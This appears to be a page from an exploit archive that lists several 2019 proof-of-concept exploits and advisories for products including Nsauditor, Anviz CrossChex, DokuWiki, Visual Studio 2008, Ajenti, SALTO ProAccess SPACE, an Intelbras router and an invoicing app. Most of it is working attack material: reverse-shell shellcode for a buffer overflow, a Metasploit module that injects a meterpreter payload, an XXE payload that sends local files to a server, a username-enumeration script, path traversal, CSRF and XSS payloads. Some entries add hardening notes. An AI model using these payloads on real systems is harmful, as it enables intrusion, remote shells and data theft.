
NSAuditor 3.1.8.0 Key Denial Of Service


NSAuditor version 3.1.8.0 suffers from a local denial of service vulnerability in the 'Key' field of its registration dialog.


MD5 | 35fb3894705a2007f79a99dca4f3eb6f

# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# Email : blackwolf@post.com

# About App
# Nsauditor Network Security Auditor is a network security tool designed to scan networks
# and hosts for vulnerabilities and to provide security alerts. It checks an enterprise
# network for the methods an attacker might use against it and creates a report of the
# potential problems found. It lets IT personnel and systems administrators gather a wide
# range of information from all the computers in the network without installing
# server-side applications on them.

# POC
# 1. Run the python script; it creates a new file "dos.txt"
# 2. Run Nsauditor and click "Register -> Enter Registration Code"
# 3. Paste the content of dos.txt into the 'Key' field
# 4. Click 'OK'
# 5. The application crashes

#!/usr/bin/env python

# 1000 'A' (0x41) bytes; pasting this into the 'Key' field crashes the application
buffer = "\x41" * 1000
try:
    with open("dos.txt", "w") as f:
        print("[+] Creating %s bytes DOS payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except IOError:
    print("File cannot be created")


Anviz CrossChex 4.3.12 Local Buffer Overflow


Anviz CrossChex version 4.3.12 suffers from a buffer overflow vulnerability.


MD5 | 9138f4c491e1f718ef30d6e17993a44d

# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html

import socket
import time
import sys

# Scapy for the broadcast packet with custom sport
from scapy.all import Raw, IP, UDP, Ether, sendp

# shellcode: pops calc.exe
calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

# shellcode windows x86 reverse_shell (part 1, up to the LHOST bytes)
shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"

# shellcode windows x86 reverse_shell (part 2; starts with port 445 = 0x01bd)
shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"


def ipToShellcode(ip):
    # Pack the dotted-quad LHOST into the 4 raw bytes the reverse-shell stub
    # expects between its two halves. inet_aton always emits one byte per
    # octet; building the string from hex() would drop the leading zero of
    # any octet below 16 (e.g. 10.0.0.5 -> "a005") and yield a wrong address.
    return socket.inet_aton(ip)


# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
    request = b"A" * 77              # Original payload substitute
    request += b"B" * 184
    request += b"\x07\x18\x42\x00"   # EIP - 00421807 crosscheck_standard.exe
    request += b"A" * 4
    # 269 bytes

    if len(sys.argv) > 2:
        request += shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
    else:
        request += calculator_payload

    sendp(Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")
          / IP(src=ip, dst='255.255.255.255')
          / UDP(sport=sport, dport=dport)
          / Raw(load=request),
          iface=sys.argv[1])


def setFuzzUDPServer(ip="255.255.255.255", port=5050, timeout=150):
    # ip is the source address stamped on the spoofed broadcast
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except socket.error:
        print('[!] Failed to create server socket')
        sys.exit(1)

    try:
        s.bind(('', port))
    except socket.error:
        print('[*] Server socket bind failed')
        sys.exit(1)

    print('[*] Waiting for crosschex')
    s.settimeout(timeout)
    deadline = time.time() + timeout
    responses = []

    # Every datagram CrossChex sends to port 5050 triggers one broadcast of the
    # overflow packet; the second recvfrom drains whatever comes back.
    while time.time() < deadline:
        try:
            response = s.recvfrom(1024)
            print(response)
            responses.append(response)
            sendFuzzingUDPBroadcast(ip=ip)
            response = s.recvfrom(1024)
        except socket.timeout:
            print("[!] Error with UDP server")

    s.close()
    return responses


if len(sys.argv) < 2:
    print("[*] Usage: python3 %s <network_interface> [<ip>]\n"
          "\tif you don't pass the ip of the LHOST it will drop a calculator, "
          "if you set the ip it will send a reverse shell to port 445" % sys.argv[0])
    sys.exit(0)

setFuzzUDPServer()

Dokuwiki 2018-04-22b Username Enumeration


Dokuwiki version 2018-04-22b suffers from a username enumeration vulnerability.


MD5 | e7533fa839fdd496e040a3329ea00401

# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: https://download.dokuwiki.org/
# Version: 2018-04-22b "Greebo"
# Tested on:
# Alpine Linux 3.5 (docker image)
# PHP 5.6.30
# Apache/2.4.25 (Unix)
# CVE :

# The login page offers a "Set new password" link ("Forgotten your password? Get a new one: Set new password").
# The form behind it answers differently for existing and non-existing usernames,
# which allows username enumeration.
# Testing for an invalid user:

POST /doku.php?id=start&do=resendpwd HTTP/1.1

sectok=&do=resendpwd&save=1&login=sss

# Response for invalid user (sss):

<div class="error">Sorry, we can't find this user in our database.</div>

========================================================================

# Testing for valid user:

POST /doku.php?id=start&do=resendpwd HTTP/1.1

sectok=&do=resendpwd&save=1&login=admin

# Response for valid user (admin):

<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>
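To turn the two responses above into a repeatable check, here is an added Python example (not part of the advisory and not DokuWiki code) that sends the same POST for a list of candidate names and classifies each body by the two error strings quoted above. The base URL, the candidate names and the fake wiki used for the offline demo are constructed. Note that the 'exists' verdict keys on the mail-sending error seen in the advisory's lab; a wiki with working SMTP answers with a different message, which the example reports as 'undetermined' so that it can be compared against a known-bogus name by hand.

```python
import urllib.parse
import urllib.request

# Response fragments quoted in the advisory. The first appears only for an
# unknown account, which is what makes the form a username oracle.
UNKNOWN_USER_MARKER = "Sorry, we can't find this user in our database."
MAIL_ERROR_MARKER = "Looks like there was an error on sending the password mail"


def build_resendpwd_request(base_url, username):
    """The POST from the advisory: do=resendpwd with save=1, sectok left empty."""
    body = urllib.parse.urlencode(
        [("sectok", ""), ("do", "resendpwd"), ("save", "1"), ("login", username)]
    ).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + "/doku.php?id=start&do=resendpwd",
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )


def classify_response(html):
    """Verdict for one response body.

    'unknown'      DokuWiki says it cannot find the user.
    'exists'       DokuWiki tried to mail a new password (in the advisory's lab
                   the SMTP step failed, which is the string matched here).
    'undetermined' Neither marker: a wiki with working mail, a throttling page
                   or an error page. Compare against a known-bogus name by hand.
    """
    if UNKNOWN_USER_MARKER in html:
        return "unknown"
    if MAIL_ERROR_MARKER in html:
        return "exists"
    return "undetermined"


def enumerate_users(base_url, candidates, fetch=None):
    """Probe every candidate and return {username: verdict}.

    fetch(request) must return the response body as text. The default performs
    the HTTP round trip; pass a fake to run the logic offline."""
    if fetch is None:
        def fetch(request):
            with urllib.request.urlopen(request, timeout=15) as response:
                return response.read().decode("utf-8", "replace")
    return {
        name: classify_response(fetch(build_resendpwd_request(base_url, name)))
        for name in candidates
    }


def fake_wiki(request):
    """Constructed stand-in for the vulnerable wiki, answering with the two
    bodies quoted in the advisory; only 'admin' is treated as a real account."""
    login = urllib.parse.parse_qs(request.data.decode())["login"][0]
    if login == "admin":
        return (
            '<div class="error">There was an unexpected problem communicating '
            "with SMTP: Could not open SMTP Port.</div>\n"
            '<div class="error">Looks like there was an error on sending the '
            "password mail. Please contact the admin!</div>"
        )
    return '<div class="error">Sorry, we can\'t find this user in our database.</div>'


if __name__ == "__main__":
    import sys
    # usage: script.py http://wiki.example name1 name2 ...   (no URL: offline demo)
    base = sys.argv[1] if len(sys.argv) > 1 else "http://wiki.example"
    names = sys.argv[2:] or ["admin", "sss"]
    fetch = None if len(sys.argv) > 1 else fake_wiki
    for name, verdict in enumerate_users(base, names, fetch=fetch).items():
        print(f"{name:<24} {verdict}")
```

The fix on the application side is a single, identical response for both cases ("if this account exists, a mail has been sent"), plus rate limiting of the form; with that in place the classifier above degrades to 'undetermined' for every name, which is the desired outcome.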

Microsoft Visual Studio 2008 Express IDE XML Injection


Microsoft Visual Studio 2008 Express IDE suffers from an XML external entity injection vulnerability.


MD5 | 789e0a22b8214672e24e1c11ee00b829

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Visual Studio 2008 Express IDE
vcsetup.exe
File hash: 62f764849e8fcdf8bfbc342685641304
Download: http://go.microsoft.com/?linkid=7729279


[Vulnerability Type]
XML External Entity Injection 0Day


[CVE Reference]
N/A


[Security Issue]
Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some of them MASM related files like .asm or .lst.
Opening any one of the file types listed below allows remote attackers to steal files from the victim's computer and send them to the
attacker's server.

Double-clicking a file with any of the following extensions triggers the XXE vulnerability. Note that upon installation of the IDE the following file types get
associated with Visual Studio 2008; ALL of them are vulnerable and will trigger the XXE exploit.

[Vuln XXE file types]
.snippet
.i
.s
.asm
.disco
.lst
.inc
.srf
.wsdl
.rgs
.xml

This IDE is pretty old, I know, but it is still available for download as of this writing, therefore I release the advisory.


[References]
https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/


[Exploit/POC]
"Evil.snippet" or any of the extensions mentioned above.

<?xml version="1.0"?>
<!DOCTYPE knobgobslob [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>


"payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;


python -m SimpleHTTPServer
python -m http.server (Python3)


[POC Video URL]
https://www.youtube.com/watch?v=QOZlwzsbPrk



[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: 3/24/2017
MSRC replied with a link to "Definition of a Security Vulnerability"; the product is also no longer supported.
December 1, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

SQLMAP - Automatic SQL Injection Tool 1.3.12


sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.


MD5 | c2cc97b70eead019d4bca860e3b7ce45


Ajenti 2.1.31 Command Injection


This Metasploit module exploits a command injection in Ajenti version 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.


MD5 | 7c4130c9c91b99ff51567ab20d19ea6e

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Ajenti auth username Command Injection',
      'Description' => %q{
        This module exploits a command injection in Ajenti == 2.1.31.
        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
      },
      'Author' => [
        'Jeremy Brown', # Vulnerability discovery
        'Onur ER <onur@onurer.net>' # Metasploit module
      ],
      'References' => [
        ['EDB', '47497']
      ],
      'DisclosureDate' => '2019-10-14',
      'License' => MSF_LICENSE,
      'Platform' => 'python',
      'Arch' => ARCH_PYTHON,
      'Privileged' => false,
      'Targets' => [
        ['Ajenti == 2.1.31', {}]
      ],
      'DefaultOptions' =>
        {
          'RPORT' => 8000,
          'SSL' => true,
          'payload' => 'python/meterpreter/reverse_tcp'
        },
      'DefaultTarget' => 0
    ))
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # Honour TARGETURI here too, so the check and the exploit hit the same base path
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'view', 'login', 'normal')
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.body =~ /ajenti/i
      return CheckCode::Safe
    end

    version = res.body.scan(/'ajentiVersion', '([\d\.]+)'/).flatten.first

    if version
      vprint_status "Ajenti version #{version}"
    end

    if version == '2.1.31'
      return CheckCode::Appears
    end

    CheckCode::Detected
  end

  def exploit
    print_status('Exploiting...')
    # The username is passed to a shell unescaped; backticks run the python payload
    json_body = {
      'username' => "`python -c \"#{payload.encoded}\"`",
      'password' => rand_text_alpha_lower(7),
      'mode' => 'normal'
    }
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
      'ctype' => 'application/json',
      'data' => JSON.generate(json_body)
    })
  end
end

SALTO ProAccess SPACE 5.5 Traversal / File Write / XSS / Bypass


SALTO ProAccess SPACE versions 5.5 and below suffer from path traversal, arbitrary file write, persistent cross site scripting, privilege escalation, and clear text transmission of sensitive data vulnerabilities.


MD5 | 4ca7d9b553568cfa84f8e2a9b3783f36

SEC Consult Vulnerability Lab Security Advisory < 20191202-0 >
=======================================================================
title: Multiple Critical Vulnerabilities
product: SALTO ProAccess SPACE
vulnerable version: <= v5.5
fixed version: >= v5.6
CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459,
CVE-2019-19460
impact: critical
homepage: https://www.saltosystems.com/en/
found: 2019-05-22
by: Werner Schober (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"SALTO ProAccess SPACE Software is a powerful access control management
tool that enables you to program access time zones for each user,
manage different calendars and obtain audit trails from each door
to see who has passed through it. The software includes special
functions such as automatic door status changes, anti-passback
and relay management.

Thanks to its advanced software features, SALTO ProAccess SPACE is also
one of the most user-friendly and powerful software products for the
access control management of stand-alone wireless devices, and IP
online devices in one converged complete access control platform
for the user, keys and doors management."

Source: http://proaccess-space.saltosystems.com/features/


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1. Path Traversal (CVE-2019-19458)
Path traversal vulnerabilities allow attackers to access files and directories
outside the application root through relative file paths in user input. During
a quick security check, multiple locations in the web application were
identified which allow an attacker to traverse outside of the application root.
The vulnerabilities were identified in the "Data Export" as well as the
"Database Export" functionality. They can for example be used to dump the
whole database into the web root by traversing outside of the application
root.

2. Arbitrary File Write (CVE-2019-19459)
By further exploiting the path traversal vulnerability inside of the
"Data Export" feature, an attacker is able to traverse into arbitrary paths
and write arbitrary files with arbitrary contents, for example files into the
web root or batch files into the autostart folder. This allows an attacker to
execute arbitrary commands on the server.

3. Stored Cross-Site-Scripting (CVE-2019-19457)
By adding devices to the SALTO network with a JavaScript payload inside of
certain parameters, an attacker is able to permanently embed arbitrary
JavaScript payloads inside of the web application.

4. Webserver running as SYSTEM (Windows Service) by default (CVE-2019-19460)
The webserver of SALTO ProAccess SPACE runs as a Windows Service with local
SYSTEM permissions by default. This is against the principle of least
privilege. An attacker who is able to exploit the path traversal or arbitrary
file write vulnerability can write to every single path on the file system,
because the webserver is running with the highest privileges available.

5. Authorization Issues
Multiple API calls were identified in the SALTO ProAccess SPACE web application,
that could normally only be called by high privileged users. Nevertheless, by
directly calling the API with the OAuth token of a low privileged user, it was
possible to call some API calls that shouldn't be available to them.

6. Cleartext transmission of sensitive data
The SALTO ProAccess SPACE web application allows their users to create so called
event streams. Those streams can be used to log events centrally. The stream
is transmitted via TCP/UDP in JSON, or CSV format. The stream is transmitted in
cleartext and leaks sensitive data such as who opened which door and when
including card ids etc.


Proof of concept:
-----------------
1. Path Traversal (CVE-2019-19458)
The "Data Export" as well as the "Database Export" features in
SALTO ProAccess SPACE allow users to specify a filename for the different
exports. By using special characters inside of the filename, an attacker is
able to traverse outside of the designated export path and place the exports
in arbitrary locations. For example, the following filename can be used
in the database export to store the database backup inside of the webroot:

..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.db

The file can then be easily retrieved via the following link without
authentication:

http(s)://$IP/backup.db


2. Arbitrary File Write (CVE-2019-19459)
The vulnerability described above can be further developed into an arbitrary
file write vulnerability by using the "Data Export" functionality. The webapp
lets their users choose an export filename and the fields, which should be
exported (e.g. Username, Notes field). To store a file with arbitrary contents
on the file system the following steps have to be conducted:

a. Store the payload inside of an arbitrary field, that can be manipulated by the
user. (E.g. Username is set to "<img src=x onerror=alert(document.location)>"
as an example for stored XSS)
b. Create a new export with the following export file name
"..\..\SALTO\ProAccess Space\bin\webapp\sectest.html"
c. Finalize the export
d. Access the file without authentication via http(s)://$IP/sectest.html
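Added example, not from the advisory or from SALTO: a Python model of the export-name handling the advisory describes, beside a hardened version. The install directories are assumptions chosen so that the advisory's own filenames resolve into the web root (the database export needs four `..\` and the data export two, so the two features are modelled with different base directories); only the two filenames and the `bin\webapp` web root come from the advisory. `ntpath` is used so the Windows path semantics run on any platform.

```python
import ntpath

# Assumed on-disk layout (the advisory does not state install paths): the two
# export features write below different directories, which is why the advisory's
# database name needs four "..\" and the data-export name only two to reach the
# same web root.
DB_EXPORT_ROOT = r"C:\Program Files (x86)\SALTO\ProAccess Space\data\backups"
DATA_EXPORT_ROOT = r"C:\Program Files (x86)\SALTO\exports"
WEBROOT = r"C:\Program Files (x86)\SALTO\ProAccess Space\bin\webapp"

# The export file names used in the advisory, verbatim.
ADVISORY_DB_NAME = r"..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.db"
ADVISORY_HTML_NAME = r"..\..\SALTO\ProAccess Space\bin\webapp\sectest.html"


def export_path_as_shipped(export_root, export_name):
    """What the advisory describes: the user-supplied export name is appended to
    the export directory and the result used as-is, so '..' walks out of it."""
    return ntpath.normpath(ntpath.join(export_root, export_name))


def lands_in_webroot(path):
    """True when a resolved export path is inside the unauthenticated web root."""
    common = ntpath.commonpath([WEBROOT, path])
    return ntpath.normcase(common) == ntpath.normcase(WEBROOT)


def safe_export_path(export_root, export_name):
    """Hardened variant: accept a bare file name only, then confirm the joined
    path still lies under export_root. Raises ValueError otherwise."""
    drive, rest = ntpath.splitdrive(export_name)
    if drive or rest in ("", ".", "..") or rest != ntpath.basename(rest):
        raise ValueError(f"rejected export name: {export_name!r}")
    root = ntpath.normpath(export_root)
    candidate = ntpath.normpath(ntpath.join(root, rest))
    # Redundant after the name check, but this containment test is the one that
    # belongs at the point of use regardless of how the name was validated.
    if ntpath.normcase(ntpath.commonpath([root, candidate])) != ntpath.normcase(root):
        raise ValueError(f"export would leave {root}: {candidate}")
    return candidate


if __name__ == "__main__":
    cases = ((DB_EXPORT_ROOT, ADVISORY_DB_NAME), (DATA_EXPORT_ROOT, ADVISORY_HTML_NAME))
    for root, name in cases:
        path = export_path_as_shipped(root, name)
        print(f"{name}\n  -> {path}  (in webroot: {lands_in_webroot(path)})")
        try:
            safe_export_path(root, name)
        except ValueError as err:
            print(f"  hardened: {err}")
```

Two things to keep in mind when porting the hardened check to a real server: `normpath` is a string operation and does not resolve junctions or symbolic links, so canonicalise through the OS (`os.path.realpath`, or `GetFinalPathNameByHandle` on an opened handle) before the containment comparison; and, as issue 4 of the advisory shows, the check matters more the higher the service runs, because with SYSTEM privileges every directory the traversal reaches is writable.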


3. Stored Cross-Site-Scripting (CVE-2019-19457)
By injecting arbitrary JavaScript payloads inside of the name of a SALTO
network device (e.g. RFID Wall Reader) an attacker is able to permanently
embed malicious JavaScript code inside of the web application that is
executed as soon as certain pages are visited.


4. Webserver running as SYSTEM (Windows Service) by default (CVE-2019-19460)
In a standard configuration the SALTO service, which also serves the
webserver on port 8100, runs as a local Windows service with SYSTEM
privileges. This causes multiple issues; one of them is that the webserver
itself runs as SYSTEM, so every file written through the export features is
written with those privileges.


5. Authorization Issues
The following API calls can be accessed by a low privileged user without any
permissions (except login permissions) set:

/rpc/DirectoryExists
/rpc/GetLicense

Those API calls can be used to determine which folders exist on the
file system.


6. Cleartext transmission of sensitive data
No PoC available.


Vulnerable / tested versions:
-----------------------------
The following versions have been tested:
* SALTO ProAccess SPACE 5.4.3.0
* Service Binary Version 4.13.3.404


Vendor contact timeline:
------------------------
2019-05-24: Contacting vendor through info@saltosystems.com
2019-05-24: Initial response from Salto Systems; providing a PGP public key for
encrypted communication
2019-05-24: Sending the encrypted advisory to Salto Systems
2019-06-11: Requesting a status update.
2019-06-12: Vendor responded with a detailed plan on how and when
the vulnerabilities are going to be fixed.
2019-09-02: Requesting status update.
2019-09-04: Vendor provides version information and further release plan updates
2019-09 - 2019-11: Multiple emails exchanged and telephone conferences discussing
the vulnerabilities
2019-12-02: Coordinated advisory release.


Solution:
---------
Update to SALTO ProAccess SPACE 5.6 which is available to customers through the
vendor's software area.


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Werner Schober / @2019


Intelbras Router RF1200 1.1.3 Cross Site Request Forgery


Intelbras Router RF1200 version 1.1.3 suffers from a cross site request forgery vulnerability.


MD5 | c32a1780d648466fdd3ed05a4ada139b

# Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery 
# Date: 2019-11-06
# Exploit Author: Joas Antonio
# Vendor Homepage: intelbras.com.br
# Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200
# Version: 1.1.3 (REQUIRED)
# Tested on: Windows
# CVE : CVE-2019-19516

#POC1:
<html>
<body>
<form method="POST" action="http://IPROUTERRF1200/login/Auth">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="21232f297a57a5a743894a0e4a801fc3"/> <!-- password admin -->
<input type="submit" value="Submit">
</form>
</body>
</html>


Online Invoicing System 2.6 Cross Site Scripting


Online Invoicing System version 2.6 suffers from a persistent cross site scripting vulnerability.


MD5 | d8fbb7aa32b5447f037e171048323f77

# Exploit Title: Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://github.com/bigprof-software/online-invoicing-system
# Software : Online Invoicing System
# Version : 2.6
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Stored XSS

# Stored XSS has been discovered in the Online Invoicing System created by bigprof/AppGini,
# in the editmembers section (pageEditGroup.php). The 'description' parameter is affected.
# payload: <script>alert(123);</script>

# HTTP POST request
POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 464
Origin: http://10.10.10.160
Connection: close
Referer: http://10.10.10.160/inovicing/app/admin/pageEditGroup.php?groupID=2
